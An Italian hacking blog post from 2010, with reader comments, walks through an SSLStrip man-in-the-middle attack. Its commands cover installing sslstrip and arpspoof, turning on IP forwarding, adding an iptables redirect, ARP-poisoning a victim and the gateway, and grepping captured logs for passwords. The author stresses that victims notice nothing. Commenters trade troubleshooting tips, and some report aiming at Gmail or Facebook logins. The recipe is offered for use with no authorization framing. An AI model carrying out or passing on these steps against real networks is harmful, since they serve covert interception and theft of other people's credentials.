ClsHack:Computer Security Blog    

SSLStrip:Attack ssl and sniff secure connetions

Posted on: 26 September 2010

Ettercap, che è il tool più conosciuto per effettuare attacchi di tipo arp poisoning, purtroppo non riesce a sniffare le password che transitano su un protocollo sicuro come l’ssl perciò cerca di ovviare questo problema.

Da wikipedia:
Transport Layer Security (TLS) and its predecessor, Secure Sockets Layer (SSL), are cryptographic protocols that provide security for communications over networks such as the Internet. TLS and SSL encrypt the segments of network connections at the Application Layer to ensure secure end-to-end transit at the Transport Layer.

Several versions of the protocols are in widespread use in applications like web browsing, electronic mail, Internet faxing, instant messaging and voice-over-IP (VoIP).

TLS is an IETF standards track protocol, last updated in RFC 5246, that was based on the earlier SSL specifications developed by Netscape Corporation.

Abbiamo già parlato di come effettuare attacchi MITM (man in the middle), con Ettercap ma non abbiamo visto come sniffare una comunicazione SSL, cioè le connessioni HTTPS.

Vediamo ora come ovviare il problema sfruttando il famoso SSLStrip e arpspoof(non usiamo ettercap per non modificare i certificati… ).

Ettercap, per sniffare connessioni HTTPS cambia il certificato, 99,9 % accettano lo stesso senza preoccupasi di ciò e si fotte :D

Mentre, con SSLSTRIP l’utente che naviga, non si accorgerà di nulla.

SSLSTRIP sostituisce tutti i collegamenti HTTPS con dei collegamenti HTTP, per qualsiasi collegamento sicuro cioè HTTPS sslstrip comunica con la vittima utilizzando una connessione HTTP , ma comunica con il server legittimo sullo stesso collegamento sicuro cioè HTTPS .

sudo apt-get install python python-twisted-web dsniff

Vediamo come installare sslstrip su ubuntu(su backbox è già installato :D )

tar zxvf sslstrip-0.8.tar.gz
cd sslstrip-0.8
sudo python ./setup.py install
echo 1 > /proc/sys/net/ipv4/ip_forward

Settiamo IpTables in maniera che reindirizzi i pacchetti HTTP verso SSLStrip

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000

Avviamo SSLStrip sulla porta 1000.

python ./sslstrip.py -l 1000 -w log_ssl -p -a

Ora, avviamo l’attaco arp posinoning:
sudo arpspoof -i INTERFACE 192.168.1.100 192.168.1.1

Dove 192.168.1.100 e l’ip della vittima, 192.168.1.1 e l’ip del (Gateway,router ).

In questo a caso, dovremo avvelenare un ip alla volta, ma va bè si può atomizzare la procedura :D basta un for :D

Ora possiamo sfruttare ettercap per il solo sniff della connessione:
ettercap -T -q -i INTERFACE
oppure, gurdare il file log di sllstrip:
cat log_ssl | grep pass=

Related posts:

  1. [cronaca]Man in the Middle attack:Guida con ettercap
  2. PyLoris 3.0: for testing a Denial of Service (DoS) attack
  3. Installare ETTERCAP su WINDOWS E UBUNTU :)
  4. w3af:Web Application Attack and Audit Framework
  5. Arp Poisoning: Dns Spoof with Ettercap [bypass proxy]

This entry was posted on Sunday, September 26th, 2010 at 3:50 pm and is filed under GNU/Linux, Hacking, Software. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Tagged with:
  • Giorgio

    ottimo!! :) Non ho capito il discorso di ettercap che cambia il certificato..
    questa frase: “Ettercap, per sniffare connessioni HTTPS cambia il certificato, 99,9 % accettano lo stesso senza preoccupasi di ciò e si fotte :D”

  • clshack

    @giorgio:

    non so se hai mai provato ettercap comunque quando una vittima, sotto attacco cercherà di loggarsi ad gmail o altro via https, si vedranno comparire davanti una finestra di dialogo che gli chiederà di esaminare il certificato dell’account , (come se ne vedono tanti) , e al momento del loro consenso in Ettercap si vedranno i loro dati di accesso :D

  • http://sixthevicious.wordpress.com/ Six110

    “Ettercap, che è il tool più conosciuto per effettuare attacchi di tipo arp poisoning, purtroppo non riesce a sniffare le password che transitano su un protocollo sicuro come l’ssl”
    Si può, si può…
    http://www.youtube.com/watch?v=ESGV9zlo0Zo

  • clshack

    @Six110:

    Si, ma come ho spiegato a giorgio, l’utente vittima deve accettare il nuovo certificato fornito da ettercap(il 99% lo fa…) , come si vede nel video, mentre, sfruttando sslstrip…l’utente vittima non si accorgerà di niente :D

  • Giorgio

    Ah capito! Non l’avevo mai provato con connessioni ssl… tutto chiaro! :)

  • Sth0

    Wow!! ottima guida.. ;-)
    ..non capisco perché dopo aver attivato sslstrip e forwardato il traffico sulla porta 1000 di sslstrip,
    per attivare l’ARP posinoning usi arpspoof e non direttamente ettercap..!!

    Comunque complimenti per il blog!
    Davvero interessante!

  • clshack

    @Sth0 :

    Perchè ettercap modifica la pagina html sostiuendo il certificato per bypassare i controlli ssl :D

    Ma abbiamo bisogno di una iterazione con l’utente ;)

    Mentre con sslstrip non abbiamo bisogno di questa iterazione e visto che nelle opzioni di ettercap non è possbile modificare questo parametro usiamo arpspoof

  • michele

    potresti sistemare gli indirizzi ip? non si capisce…sono uguali!

  • clshack_

    fatto!

  • michele

    Ho un problemino….
    se faccio il cat del log di sslstrip vedo i dati, ma se lancio ettercap non vedo un piffero…
    devo togliere o mettere il commento su ettercap.conf alle 2 righe iptables? magari è lì il problema? (commentate o no?)
    Altre idee?

  • clshack_

    @michele:

    apri wireshark vedrai che vei tutto per bene :)

    Comunque guarda qui:
    http://www.clshack.it/video-tutorialbackbox-sslstrip-netcmd.html

  • michele renzullo

    ma perchè anche se modifico l’etter.conf togliendo # ettercap nn mi riesce a sniffare password cifrate ssl!!!!! Invece con quelle tipo gbarl , tnt village ovvero http me le sniffa tranquillamente. Vi prego aiutatemi mi sto esaurendo con sto programma che sembra facile eppure faccio tutto bene!!!

  • clshack_

    perchè ettercap modifica i certificati e il tizio deve accettarli lavorano in modo diverso sslsniff e etercap

  • Honik

    Ciao clshack!! E’ da ieri che faccio i test su questo programma sslstrip.. ma nel pc “Vittima” .. che è sempre mio.. mi appare la finestra che avverte del certificato.. ma uso ettercap solo come sniff…
    come mai succede questo??
    grazie mille

  • clshack_
  • Honik

    Si ora va tutto alla grande.. quindi ettercap rompe le scatole anche solo in modalità sniffing.. non pensavo..
    ti ringrazio clshack.. sei grande come sempre!!

  • clshack_

    ahah di niente ;)

    P.S. ettercap è vecchio ormai :D

  • L1ghtman

    NIente ho configurato tutto alla perfezione ma quando dal computer target accedo a gmail o facebook su ettercap non visualizzo nulla, non mi chiede di cambiare il certifica… Uso Backbox 2.05… Qualcuno mi può aiutare???